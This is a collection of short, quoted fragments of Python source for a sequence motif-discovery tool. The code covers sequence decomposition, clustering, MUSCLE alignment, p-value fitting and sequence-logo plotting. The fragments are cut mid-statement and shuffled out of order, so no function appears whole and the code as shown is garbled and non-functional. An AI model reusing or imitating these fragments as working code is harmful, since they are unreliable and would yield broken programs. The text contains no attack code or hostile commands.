"in seqs: if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None):",
"sequences in a cluster with enough space that # kmers dont interfere cluster_seqs",
"import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence",
"seqs): # seperating headers headers, instances = [list(x) for x in zip(*seqs)] instances_seqrecord",
"= self.compute_p_value(score) if p <= p_value: yield orig_header, begin, end, p, subseq except",
"' ' * (complexity * 2) # join all sequences in a cluster",
"import apply_async import numpy as np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import",
"e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3):",
"estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time =",
"= self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: return True",
"trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True, motif else: return False, None def",
"regex_th: if letter != '-': code.append(letter) if len(code) == 0: code_str = None",
"def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s in seqs]) sigs",
"seq_id, begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list)",
"= error_bars if title: options.title = title if figure_label: options.logo_label = figure_label options.show_xaxis",
"= '### Summary: %d motives' % len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs,",
"= ids[i + 1] width = end - start val = sum(sig[start:end]) yield",
"sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score')",
"min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m for m in",
"Counter(row) k = c.most_common() seq += k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8):",
"Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self,",
"pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test,",
"units='bits', first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='',",
"nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i = motives[i]['regex_seq'] if",
"logo_txt = [] info = ' - num subarrays: %d' % len(motif['seqs']) logo_txt.append(info)",
"align_seqs: trimmed_align_seq = [a for i, a in enumerate(align_seq) if i not in",
"too strict. Ignoring filter.') return motives else: logger.debug('After quality filter, %d motives' %",
"fname + '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2),",
"def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable = self.decompose(seqs, p_value=p_value)",
"% \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i",
"plt.show() plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for h,",
"self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\" #",
"self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score, i, j in ms:",
"s in seqs]) sigs = None for scores in smod.score(seqs): sig = np.array(scores)",
"= muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs =",
"'\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\" style=\"width: 100%\"></p>')",
"i, a in enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score,",
"j in motives: if j > i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq']",
"return self.clusters except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception',",
"figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def",
"cluster_ids = [cluster_id for begin, end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for",
"freq_th is None or freq >= freq_th: if std_th is None or std",
"trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start, end, width =",
"= [cluster_id for cluster_id in motives] logos = dict() for cluster_id in ids:",
"+ '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen',",
"\"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size",
"False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not",
"[] if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '### Summary: %d",
"s = match.start() e = match.end() m = s + (e - s)",
"if alphabet == 'protein': self.alphabet = IUPAC.protein elif alphabet == 'rna': self.alphabet =",
"= [] for h, align_seq in align_seqs: str_list = [c for c in",
"neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs ==",
"show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label =",
"self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys)",
"the seqs and compute their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix =",
"as wbl from scipy.cluster.hierarchy import linkage import regex as re from collections import",
"to_be_removed.append(i) val = k[1][1] else: val = k[0][1] if float(val) / dim >=",
"for i, p in enumerate(results): loc_start_time = time.time() scores = p.get() scores_items +=",
"= motives[i]['regex_seq'] if j != cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)]",
"align_seqs: str_list = [c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str)",
"= np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred =",
"= metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders = [] for id1,",
"self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1",
"%.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix",
"pwd + '/' + fname txt = [] if fill_width: if output_type ==",
"= distances[(cluster_id, j)] info = ' - num co-occurences %d %s vs %d",
"e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1] score = float(score) loc",
"j, regex_j, len(ds)) txt.append(info) if len(ds): figname = plot_distance( cluster_id, j, regex_i, regex_j,",
"for c_i in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs =",
"scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip import time",
"size, regex_th=regex_th) if l: code += l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\"",
"len(xs) + 1) / float(len(xs)) return xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\"",
"defaultdict(list) for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' %",
"= plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if",
"for h, align_seq in align_seqs: str_list = [c for c in align_seq] concat_str",
"align_seq in align_seqs: str_list = [c for c in align_seq] concat_str = np.array(str_list,",
"color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image =",
"matrices = [] for i, p in enumerate(results): loc_start_time = time.time() pos_data_matrix =",
"min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d (#%d), %d (#%d)",
"size)) for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for begin, end, cluster_id in",
"logger = logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 / (1 +",
"half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start, end, width = max(box_decomposition(sig, half_windw_size))",
"if l: code += l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h,",
"self.options) if self.output_format == 'png': return wbl.png_formatter(data, format) elif self.output_format == 'png_print': return",
"Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self,",
"motives' % len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives:",
"def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives: for j in motives: if",
"(cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds): figname = plot_distance( cluster_id, j,",
"regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq =",
"occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size = len(haystack) return counts, float(counts)",
"curve_fit(sigmoid, xs, ys) self.a, self.b = popt else: logger.debug('Warning: reverting to default values')",
"plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname = '%s_importance.png' % (fname) plt.savefig(",
"- c_j): selected = c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx",
"concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for i,",
"cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j,",
"success = False for rel_nw_score, i, j in ms: if motives.get(i, None) and",
"if fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"",
"c = Counter(row) k = c.most_common() seq += k[0][0] return seq def _compute_score(self,",
"motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m",
"= self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self,",
"= edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score / (len(seq_i) + len(seq_j))",
"min_sig == sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size))",
"['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition",
"st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs,",
"pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters)",
"subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time",
"min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime = time.time() - start_time",
"j] += 1 if i != j: # find closest instance j from",
"trimmed_align_seq = [a for i, a in enumerate(align_seq) if i not in to_be_removed]",
"== -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results = [apply_async( pool,",
"_, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '### Summary: %d motives' % len(motives)",
"+ motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if",
"(metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception',",
"pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results",
"elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self,",
"= tokens[0] begin, end = tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives,",
"return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report",
"popt else: logger.debug('Warning: reverting to default values') logger.debug('ECDF fit on %d values' %",
"letter_regex(k, size, regex_th=regex_th) if l: code += l return code def find_occurrences(needle, haystack):",
"iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b",
"subarrays_items += subarrays_item d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time",
"id2 < len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster = [] for",
"\"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs)",
"<= p_value: yield orig_header, begin, end, p, subseq except Exception as e: logger.debug('Failed",
"muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = ['']",
"MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout): out =",
"i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() if k[0][0] ==",
"any instance in i d_ij = [] for c_i in centers[i]: for c_j",
"None: ids = [cluster_id for cluster_id in motives] logos = dict() for cluster_id",
"regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No clusters.') mcs = min_cluster_size",
"Motif id: %d' % cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname",
"with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if",
"if sigs is None: if len(sig) >= median_len: sigs = sig[:median_len] else: if",
"txt.append(info) info = ' - freq of occurrences of regex: %.2f' % (fr)",
"@email: <EMAIL> \"\"\" import logging import multiprocessing as mp import os from collections",
"y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC:",
"% motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives:",
"j: # find closest instance j from any instance in i d_ij =",
"handle, \"fasta\") data = handle.getvalue() return headers, data def _perform_ma(self, data): params =",
"Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit",
"= header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1] begin, end = loc.split(':') begin",
"+ np.exp(-(x - a) / b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on",
"\"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else:",
"= [cluster_id for begin, end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for begin,",
"in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time =",
"= time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix,",
"seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Fitting') start_time",
"for j in motives: regex_i = motives[i]['regex_seq'] if j != cluster_id: regex_j =",
"else: logger.debug('After quality filter, %d motives' % len(_motives)) return _motives def select_motives(self, seqs=None,",
"i in motives], reverse=True): info = ' - %.2s %s' % \\ (cluster_id,",
"data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs #",
"similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th)",
"= random_state self.a = -4 self.b = 1 def ecdf(self, x): \"\"\"Empirical cumulative",
"e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test =",
"haystack: matches = re.findall(needle, s, overlapped=True) if len(matches): yield 1 else: yield 0",
"is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else:",
"transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5):",
"= 'Joining: %d (#%d), %d (#%d) score: %.2f' % \\ (i, n_i, j,",
"\"\"\"A wrapper to perform Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None,",
"c_j)) selected_abs = min(d_ij) for c_i in centers[i]: for c_j in centers[j]: if",
"= wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint = fineprint self.options = options",
"'>': if seq: yield seq seq = \"\" line_str = str(line) yield line_str.strip()",
"e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score",
"-1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process,",
"- y return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = []",
"/ float(size) > regex_th: if letter != '-': code.append(letter) if len(code) == 0:",
"import SeqRecord from corebio.seq import Alphabet, SeqList import weblogolib as wbl from scipy.cluster.hierarchy",
"a, b): \"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x - a) / b))",
"params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout def",
"predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 - y",
"fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid,",
"neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm)",
"filter is too strict. Ignoring filter.') return motives else: logger.debug('After quality filter, %d",
"chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Fitting') start_time = time.time()",
"reverse=True): info = ' - %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for",
"quality filter, %d motives' % len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5,",
"subarray['score'] header = orig_header header += '<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>'",
"sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check if this alphabet is",
"@author: <NAME> @email: <EMAIL> \"\"\" import logging import multiprocessing as mp import os",
"_decompose_header(self, header): score = header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1] begin, end",
"line_str.strip() else: line_str = line.split() if line_str: seq += str(line_str[0]).strip() if seq: yield",
"cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname)",
"motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] =",
"in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for c_i in centers[i]: for",
"y, classes=classes) d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size",
"70) - np.percentile(locs, 30) else: avg_loc = -1 std_loc = 0 return avg_loc,",
"if len(sig) != median_len: logger.debug('Length mismatch: %d != %d' % (len(sig), median_len)) if",
"sig = cumulative_score(seqs, smod) val, start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s",
"= time.time() - start_time d_loc_time = time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d",
"%d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def predict(self,",
"i, p in enumerate(results): loc_start_time = time.time() subarrays_item = p.get() subarrays_items += subarrays_item",
"_perform_ma(self, data): params = {'maxiters': 7} if self.diags is True: params['diags'] = True",
"- a) / b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the empirical",
"import izip import time from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier",
"IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances",
"filter.') return motives else: logger.debug('After quality filter, %d motives' % len(_motives)) return _motives",
"== 'png': return wbl.png_formatter(data, format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif",
"motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if",
"new class definition logger.debug('After merge, %d motives' % len(motives)) return motives def quality_filter(self,",
"else: return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma",
"binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator)",
"-1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_score,",
"% (subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def",
"(val, start, end, width)) for h, s in seqs: if s[start:end]: yield (h,",
"in range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i - half_windw_size:i + half_windw_size]) if",
"def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for",
"y += [-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix])",
"import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 /",
"%s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw() figname =",
"c = linkage(gram_matrix, method='single') orders = [] for id1, id2 in c[:, 0:2]:",
"in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = '#### Motif id:",
"if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight',",
"p in enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get() matrices += pos_data_matrix d_time",
"pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i",
"regex_th) counts, freq = occurrences(c_regex, seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def",
"raise Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id",
"= header new_header += '<loc>' + str(begin) + ':' new_header += str(end) +",
"selected_abs == abs(c_i - c_j): selected = c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx",
"color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = ' - num subarrays:",
"= True if self.maxhours is not None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params)",
"d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size = pos_data_matrix.shape",
"np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable,",
"IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances = [list(x) for x",
"self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\"",
"subarrays_items: components = self._decompose_header(header) orig_header, score, begin, end, subseq = components p =",
"len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster = [] for h, align_seq",
"[] for h, align_seq in trimmed_align_seqs: str_list = [c for c in align_seq]",
"n_i, j, n_j, rel_nw_score) info2 = ' deleting: %d [%d is now #%d]'",
"\"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq",
"if locs: avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs, 70) - np.percentile(locs, 30)",
"self.a, self.b = popt else: logger.debug('Warning: reverting to default values') logger.debug('ECDF fit on",
"import numpy as np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from",
"[apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs'",
"= wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name =",
"import Vectorizer from StringIO import StringIO from Bio import SeqIO from Bio.Align.Applications import",
"function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs) + 1) / float(len(xs)) return",
"consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq']",
"logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt",
"align_seqs): cluster = [] for h, align_seq in align_seqs: str_list = [c for",
"cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos else: logger.warning( 'No logo to",
"i in motives: for j in motives: if j > i: seq_i =",
"# roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed iteration.",
"concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score = 0 to_be_removed =",
"motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos else: logger.warning( 'No logo to compute.",
"for letter, count in k: if count / float(size) > regex_th: if letter",
"+ '|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = []",
"sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and compute their gram matrix K cluster_vecs",
"1] width = end - start val = sum(sig[start:end]) yield val, start, end,",
"['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters = maxiters",
"end, i)) distances = defaultdict(list) size = max(id for id in motives) +",
"seq = \"\" line_str = str(line) yield line_str.strip() else: line_str = line.split() if",
"motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is None: ids = [cluster_id for",
"regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives",
"a motif finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import logging import multiprocessing",
"cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return",
"chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable,",
"= (header, seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None,",
"data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time",
